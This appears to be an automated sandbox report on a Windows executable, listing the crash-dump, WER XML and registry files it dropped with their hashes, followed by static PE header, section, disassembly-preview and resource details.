                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:25 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):114678
                                  Entropy (8bit):1.810685030670006
                                  Encrypted:false
                                  SSDEEP:384:8iykRnaAE0pudHz2M2/ID/KQV4BOwbMxSgrAYa1:VRaAE0pudHKxID/KQVOSShYS
                                  MD5:6435AB8840307F9CD081C97714C841C3
                                  SHA1:8C41A3B0344BB117E3DB8E502566D0A8ACAC7B0F
                                  SHA-256:7AD65632C889523F8A647FD6C947F48CF3650DA864A6BB5E3DC535F28992BAFA
                                  SHA-512:3CBC0CBB2FA40E34D594B7E089BB534B4F969389B0508DD7A2B82D21C56E52AC2C8930A91B5A93DC896CEB1CAD83EC207F94A48814DCB7C7DB0B5ED2AF1FE9C3
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g........................................z@..........T.......8...........T...........X0..........................................................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.701471180683204
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTC6S6YEIRSUdDigmfI9GpBa89b5asfBLvzm:R6lXJ26S6YEeSUdDigmfGy55fBLy
                                  MD5:765E519F758789EF65BEF7FB03FAD9CC
                                  SHA1:380E9AD0757A9B5DFA011219C09358C286D07809
                                  SHA-256:7757D1344680486D26812393984B31C2740C2022F8CF608A9432778ED99D94E4
                                  SHA-512:DF588EF6A4806EAA8F7A727FD9A7ADF250CE83FFB10F3C71C755F0E70784B083A5D488B10AEFDFF53BDDD88066E63C083F0AFD07F8BB171ACA370F525A76353B
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.489632957800002
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VY/j0Ym8M4JIvHFPiF+q8vhXNj2NHQd:uIjf1I75XiTY7V4FJKiFKRMNHQd
                                  MD5:A4B647636525A91F96EC1205F34A5FA6
                                  SHA1:D427014238970BE29DC1F7EFCE895C17EED95288
                                  SHA-256:0288A537CA47AF8623E2E62E3081FF73CE71C05C3372159E3D8838F1200D2EFB
                                  SHA-512:05CD73C0BA77969F7B8819082E59C0936355EB7AB08111DF0C11DA62AE2AD5B45ABFA90913A26A60C5812D5ED97BE901F29ECA4473A490CF7E119F17CF6C1A07
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:26 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):117730
                                  Entropy (8bit):1.7250580002851033
                                  Encrypted:false
                                  SSDEEP:384:pbgktAEZ13z2GgycSuoYnT+Nxc4uZC1DgG6UY:lgcAEZhK/yPgTj4p156N
                                  MD5:B7D3AB97A6FA6931C7919CCD5B666126
                                  SHA1:44C620660AB371921F5784F6F02844F4D8874596
                                  SHA-256:46C9F99176D6304EECD6C9EFFAC9AE66CD87758F652AF3C1561CAC243C56F8E6
                                  SHA-512:06F0344FED515BB54E536CDF78945777779605B0A0497AB8A840DB95E6B01F85540B909C8E1AC935CB7EB81B0AC2E2EF947B28C7CF461E30E788127878ECA05D
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g....................................d....E..........T.......8...........T............3.........................................................................................................eJ....... ......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8442
                                  Entropy (8bit):3.7009066823746997
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTjkh6ZBKb6YEIYSUwDsgmfI9GpBO89biasf3dWm:R6lXJfY6Zcb6YEHSUwDsgmfGmi5fF
                                  MD5:FD2FBD4F5E61C9495EF0F01C79AD1D92
                                  SHA1:EAF739B0E7075ADCD3D94FA7F6BDDFE7706E67E5
                                  SHA-256:73B82DE25FA6E945CC541D1381077442C5B2D143493709C9991EC778533467C4
                                  SHA-512:3A7DC8B762637AF5E41B995B2CCDB26546C23157F27B056E9CE1CFDAEBB349C093FE5A93C2B75DA23B64E310CAE8EA952BBCBAF4575C2E3453BEE640779115E1
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.489706820925829
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYhYm8M4JIvHF42+q8vhXNj2NHQd:uIjf1I75XiTY7VZJuKRMNHQd
                                  MD5:1599CF98CD1AC8BB5B6D181D77AA20C8
                                  SHA1:434E8A81CBE2AABB3D4A67F2B89A9361CCA8DAFF
                                  SHA-256:EB03B25DDB7E7F01234EE8C4112AC3D0A99107BA48652C1D36D9201FC98F4A43
                                  SHA-512:13C109FF75190C21A89A2FDF49A45404D6C6DE6747DDD33CCB623440B68C6451A80AC9117CC8362AC91CAE1A6FA81275DCADE09A1FC08E17398989B997E9ED5C
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:28 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):60106
                                  Entropy (8bit):1.801363188309585
                                  Encrypted:false
                                  SSDEEP:192:xjr1FkT7XwmXOAOJwMAMCT+zPV04nMnHCbPy3jdata4l6v+g21/0:5hFkY7AEOT+k2yJattx71/0
                                  MD5:9556F20141DE600CDF788584DD4F922D
                                  SHA1:5AAFE18007C780862ADA94106225D375EE0C89C9
                                  SHA-256:BCA03FF3D9CE682F88A7D9DA957757F4A30A8DB653D05B351D05689E4EE54B68
                                  SHA-512:1F98F2429B46FF4E2DAC53474672899BDD2034537606C8091689109B624233BE5FBA8E06106FA60D35962D34F0A74084DB4B713635BCEA39AC8E83B8F11E9552
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g............4...............<...........0*..........T.......8...........T...........`2..j...........X...........D...............................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8338
                                  Entropy (8bit):3.698052462220816
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTl6kKb6YEI/SUDDqgmfnhcA8pDRC89bMasfikm:R6lXJR6X6YEwSUDDqgmfWH7M5fw
                                  MD5:32B7D9450D0F897C23E306E0E4E502E9
                                  SHA1:A01D6537EC4A92E37416F6106A40312DCC9EC24F
                                  SHA-256:B99A138406A136FA4561D0045423C1D6B5094AB0EB58B15C6FA31A9287F4CE0A
                                  SHA-512:02132E9A60F55687AC06830CADC0EDFA36CEDCD50CA8BB91A17691758182BE4946DE2758367AA8266748C03EB6173BBAB44755FC90120166C20065106DE3E47E
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4579
                                  Entropy (8bit):4.4747764069700775
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VY+Ym8M4JIv1LFTI+q8IwzNj2NHQd:uIjf1I75XiTY7V+JcZIGzMNHQd
                                  MD5:3B60AA1251CE292AB49E601516C00851
                                  SHA1:22ECAF771BB2A1B53BE1206E4DD17BE908A52729
                                  SHA-256:77026AE8479EEC907065FADEDF5E3C0452DF726C072E600E243C2BB1D223AED6
                                  SHA-512:17A202BB18E86132A6E77219EFA5F81C33FFEA7C6ED62FB5FE5646EAC96B6B3EFCEF4FAAF88DA6B02C485B9A9DAD78955C9CF21C090433B4CFFE9D6CD5F4167D
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421572613897447
                                  Encrypted:false
                                  SSDEEP:6144:CSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN70uhiTw:RvloTMW+EZMM6DFyJ03w
                                  MD5:64F7CCC8A4973F7D147B8C9046564538
                                  SHA1:179DA61EF53DF24F2D310013A60467A79BCCFABB
                                  SHA-256:3D90109C3ABF5EF37DAC5CF1770C10DBD55EE7C4F31AF4566DFB6B9ACEAB459B
                                  SHA-512:E54D5D16FEFEB3C84F30B838B77F946226E9EA70654FA397E4C00FBC8891F6008F8ADDD62320244CBD24D8E6C34F030A0F26CE5E31D10C64ADDDE0AB41EC3D09
                                  Malicious:false
                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR._.Z.................................................................................................................................................................................................................................................................................................................................................H.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.045084053766364
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:ttFpxuMwKz.exe
                                  File size:336'896 bytes
                                  MD5:56f2a1223362b66cca9bf86b7cacad0c
                                  SHA1:484699fe4ecde29da1c5c73892881cea2f98eb8a
                                  SHA256:b5a8df0c020433116e2ec77cb313fc9f6d17fa57a8256c41adf5eec6e693e145
                                  SHA512:1e91f0c43f3e301ab2941fcdc6351c9e8462a526b79985ea39f8a23f9446ad5b1efe7947075c9df56944df848370b5c4860ce3901cc3508149507ab7efd9df4c
                                  SSDEEP:3072:X4L2rpWD9Oms9tuw4tATZbKaUIqPG6IExEBAUpyDfF4ZjuGIGhudKjXrRy5NnCu3:X4L2r89NMBUn07cfKpu5qSgKJvNJ
                                  TLSH:F664BF1062F2DF35F7B745325A75A6E8193BBDF6AA30C06E1103F69F0CB66918A05B13
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L...T5dd...................
                                  Icon Hash:17694cb2b24d3917
                                  Entrypoint:0x401667
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x64643554 [Wed May 17 02:00:52 2023 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:fbc3e75f2d9f9185d8f077824c0d6c28
                                  Instruction
                                  call 00007F7F08839494h
                                  jmp 00007F7F0883689Eh
                                  mov edi, edi
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 00000328h
                                  mov dword ptr [004353C8h], eax
                                  mov dword ptr [004353C4h], ecx
                                  mov dword ptr [004353C0h], edx
                                  mov dword ptr [004353BCh], ebx
                                  mov dword ptr [004353B8h], esi
                                  mov dword ptr [004353B4h], edi
                                  mov word ptr [004353E0h], ss
                                  mov word ptr [004353D4h], cs
                                  mov word ptr [004353B0h], ds
                                  mov word ptr [004353ACh], es
                                  mov word ptr [004353A8h], fs
                                  mov word ptr [004353A4h], gs
                                  pushfd
                                  pop dword ptr [004353D8h]
                                  mov eax, dword ptr [ebp+00h]
                                  mov dword ptr [004353CCh], eax
                                  mov eax, dword ptr [ebp+04h]
                                  mov dword ptr [004353D0h], eax
                                  lea eax, dword ptr [ebp+08h]
                                  mov dword ptr [004353DCh], eax
                                  mov eax, dword ptr [ebp-00000320h]
                                  mov dword ptr [00435318h], 00010001h
                                  mov eax, dword ptr [004353D0h]
                                  mov dword ptr [004352CCh], eax
                                  mov dword ptr [004352C0h], C0000409h
                                  mov dword ptr [004352C4h], 00000001h
                                  mov eax, dword ptr [00434008h]
                                  mov dword ptr [ebp-00000328h], eax
                                  mov eax, dword ptr [0043400Ch]
                                  mov dword ptr [ebp-00000324h], eax
                                  call dword ptr [000000CCh]
                                  Programming Language:
                                  • [C++] VS2008 build 21022
                                  • [ASM] VS2008 build 21022
                                  • [ C ] VS2008 build 21022
                                  • [IMP] VS2005 build 50727
                                  • [RES] VS2008 build 21022
                                  • [LNK] VS2008 build 21022
                                   Name                                  Virtual Address  Virtual Size  Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_IMPORT          0x336c4          0x3c          .rdata
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE        0x112000         0x1d348       .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_TLS             0x333f8          0x18          .rdata
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_IAT             0x32000          0x184         .rdata
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                   Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type  Entropy             Characteristics
                                   .text     0x1000           0x308df       0x30a00   fcd1aa5d002e765dff17d096e9326bcb  False     0.9253594955012854    data       7.873070673293666   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                   .rdata    0x32000          0x1fa0        0x2000    cbb94a8c54dfb9bbd30a01ee0dd3d905  False     0.3682861328125       data       5.598363170922723   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .data     0x34000          0xda67c       0x1400    c2377d077ee99e993251b8cb1054832a  False     0.1681640625          data       1.8222435798688998  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .tojo     0x10f000         0x400         0x400     0f343b0931126a20f133d67c2b018a3b  False     0.0166015625          data       0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .tls      0x110000         0x51d         0x600     53e979547d8c2ea86560ac45de08ae25  False     0.013020833333333334  data       0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .jedemeb  0x111000         0x400         0x400     0f343b0931126a20f133d67c2b018a3b  False     0.0166015625          data       0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .rsrc     0x112000         0x14e348      0x1d400   854d6fb0b10cdc605bd64f8ca03c0a2e  False     0.4640090811965812    data       5.093496247518819   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   Name       RVA       Size    Type                                                                                   Language  Country  ZLIB Complexity
                                   RT_CURSOR  0x12a558  0x130   Device independent bitmap graphic, 32 x 64 x 1, image size 0                                               0.4276315789473684
                                   RT_ICON    0x112a30  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors  Turkish   Turkey   0.5711620469083155
                                   RT_ICON    0x1138d8  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  Turkish   Turkey   0.641245487364621
                                   RT_ICON    0x114180  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors   Turkish   Turkey   0.6941244239631337
                                   RT_ICON    0x114848  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors   Turkish   Turkey   0.7514450867052023
                                   RT_ICON    0x114db0  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9216                       Turkish   Turkey   0.5196058091286307
                                   RT_ICON    0x117358  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4096                       Turkish   Turkey   0.62406191369606
                                   RT_ICON    0x118400  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2304                       Turkish   Turkey   0.6311475409836066
                                   RT_ICON    0x118d88  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1024                       Turkish   Turkey   0.7659574468085106
                                   RT_ICON    0x119268  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors  Turkish   Turkey   0.40405117270788915
                                   RT_ICON    0x11a110  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  Turkish   Turkey   0.49864620938628157
                                   RT_ICON    0x11a9b8  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors   Turkish   Turkey   0.5253456221198156
                                   RT_ICON    0x11b080  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors   Turkish   Turkey   0.555635838150289
                                   RT_ICON    0x11b5e8  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600                       Turkish   Turkey   0.34854771784232363
                                   RT_ICON    0x11db90  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224                       Turkish   Turkey   0.37546904315197
                                   RT_ICON    0x11ec38  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2400                       Turkish   Turkey   0.3975409836065574
                                   RT_ICON    0x11f5c0  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088                       Turkish   Turkey   0.4148936170212766
                                   RT_ICON    0x11faa0  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0                           Turkish   Turkey   0.39792110874200426
                                   RT_ICON    0x120948  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0                           Turkish   Turkey   0.5591155234657039
                                   RT_ICON    0x1211f0  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0                           Turkish   Turkey   0.6169354838709677
                                   RT_ICON    0x1218b8  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0                           Turkish   Turkey   0.6416184971098265
                                   RT_ICON    0x121e20  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0                          Turkish   Turkey   0.43550656660412757
                                   RT_ICON    0x122ec8  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0                          Turkish   Turkey   0.42991803278688523
                                   RT_ICON    0x123850  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0                          Turkish   Turkey   0.47606382978723405
                                   RT_ICON    0x123d20  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors  Turkish   Turkey   0.40405117270788915
